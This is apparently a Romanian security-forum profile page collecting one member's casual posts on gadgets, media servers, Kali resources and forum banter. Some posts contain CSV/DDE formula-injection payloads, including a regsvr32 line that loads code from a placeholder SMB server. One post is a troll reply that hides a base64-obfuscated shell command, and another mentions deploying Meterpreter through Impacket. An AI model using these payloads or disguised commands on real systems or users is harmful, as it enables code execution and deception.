Jump to content

theeternalwanderer

Active Members
  • Posts

    323
  • Joined

  • Last visited

  • Days Won

    5

Everything posted by theeternalwanderer

  1. @FarSe las-o mai moale cu laba ca o iei pe aratura Ideea de a folosi lucruri fara a le detine mi se pare o chestie foarte desteapta care, daca este implementata cu cap ar trebui sa reduca deseurile sau productia nenecesara de produse. Un exemplu bun sunt hacker/makerspace unde ai echipament specializat de care poate ai nevoie o singura data la un singur proiect. Un alt exemplu este biblioteca lucrurilor de unde poti inchiria diverse obiecte de care poate ai nevoie o data pe an - cum ar fi o bormasina.
  2. Inca un articol recent pe aceiasi tema - http://georgemauer.net/2017/10/07/csv-injection.html. Exista cateva chestii dragute care se pot face cu DDE: =cmd|'/C calc'!A0 (exemplul clasic) =IExplore|WWW_OpenURL!www.mataigrasa.com =regsvr32|\\<fakeSmbServer>\\mataigrasa!A0 De cele mai multe ori am intalnit chestia asta in aplicatii web care genereaza rapoarte in format CSV/XLS unde tu ai un oarecare control asupra datelor care intra in raport.
  3. NOOOO! Aveam solutia! De ce i-ai dat ban asa de repede... In caz ca altcineva are probleme: <comanda scanner aici>; `echo cm0gL3RtcC9raWxsbWUK | base64 -d`; for i in $results; do echo $i > /tmp/parole; done
  4. -----BEGIN PGP PUBLIC KEY BLOCK-----
    Version: OpenPGP v2.0.8
    Comment: https://sela.io/pgp/

    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
    Fz67QRjsjoV6laVr
    =ZjU7
    -----END PGP PUBLIC KEY BLOCK-----

  5. Interesant PoC-ul dar in practica as folosi sqlmap pentru dumping - in principal pentru ca este time-based SQLi care poate sa dureze destul de mult in functie de dimensiunea bazei de date. In plus sqlmap iti permite sa vezi structura bazei de date si sa extragi doar tabelele care par interesante.
  6. Interesant ca concept, dar are aceaisi problema pe care o prezinta orice forma autentificare biometrica - informatia nu este secreta.
  7. https://github.com/CoreSecurity/impacket Am folosit recent smbserver.py din Impacket ca sa urc un Meterpreter pe un Windows. Functioneaza aseamator cu SimpleHTTPServer din Python.
  8. https://kali.training http://vue.com/kali/ https://kali.training/downloads/Kali-Linux-Revealed-1st-edition.pdf
  9. Android - Pixel iOS - iPhone Linux - Nokia N900 (vechi, dar foarte distractiv) Other - Nokia 3310
  10. Google 100GB e $2/luna. Sau Emby/Plex/Kodi ca o alternativa locala. https://www.htpcbeginner.com/plex-vs-emby-comparison-with-kodi/ https://emby.media/download.html https://www.plex.tv/ https://kodi.tv/
  11. Ai venit cautand informatii despre "cum sa dai flood", situatie care cere putin trolling nevinovat, nu o lua personal. Majoritatea puberilor care trec pe-aici (si nu stau mult) vin tot cu prostii de genul ajutor la spart faisbucul lui X, ajutor la spart site-ul Y + sob story, si alte aiureli de genul. Daca vrei sa inveti, asa cum spui, atunci incearca sa afli ce presupune un astfel de atac. Sau mai bine, si mai productiv, incearca sa afli cum functioneaza o retea. Apoi, dupa ce stii cum functioneaza o retea, chiar si la un nivel rudimentar, poti sa incepi sa te uit la metode de atac deja existente care folosesc sau abuzeaza felul in functioneaza reteaua. Cam aici ar trebui sa-ti dai seama de ce raspunsul lui Nytro este cel mai pertinent la intrebarea ta.
  12. "piratare de orice fel" - a.k.a download and install crack, lol, gg, no re. Sau te referi cumva la reverse engineering si DRM-bypass?
  13. @deauxefeforsaken Acum 8 ani te-a inselat si tu ai ramas cu ea. Acum 8 ani tu ai batut-o iar ea a ramas cu tine. Pare ca va potriviti si va meritati reciproc. Why stop now? On-topic in acest off-topic: Vrei sa afli daca iti este infidela din motive legale - ma refer la anumite clauze care ar putea exista intr-un contract prenuptial, etc. ? Sau doar ca sa stii daca ai motiv sa o iei la suturi (lucru imbecil, btw)? In cazul in care este vorba de prima varianta, as consulta un avocat inainte de orice si as lua in considerare serviciile unui detectiv particular. In cazul in care este vorba de a doua varianta, iti irosesti timpul. Per total, in cazul in care intr-adevar te inseala, varianta eleganta ar fi sa iti separi afacerile de ea si sa inchei relatia.
  14. @jetus, nu am mai folosit un calculator pentru diagnostic OBD2 de ceva vreme, si atunci cand am folosit un soft pe PC am fost profund dezamagit. Personal am un cititor de sine statator pentru Toyota care isi face treaba foarte bine si nu am nevoie de un calculator. De BlueDriver am aflat dupa ce l-am cumparat pe asta.
  15. Daca ai port OBD2 iti recomand BlueDriver ODB2.
  16. @aismen extrapolam la "there are no bitches on the Interent"?
  17. Ai putea incerca sa banezi o clasa IP pentru utilizatorii care folosesc AndroIRC ca sa nu afectezi toti utilizatorii din clasa respectiva. P.S.: https://1d4chan.org/wiki/No_Girls_on_the_Internet
  18. @aelius esti pe dinafara, aici e vorba de 1337 haxx0rs!
×
×
  • Create New...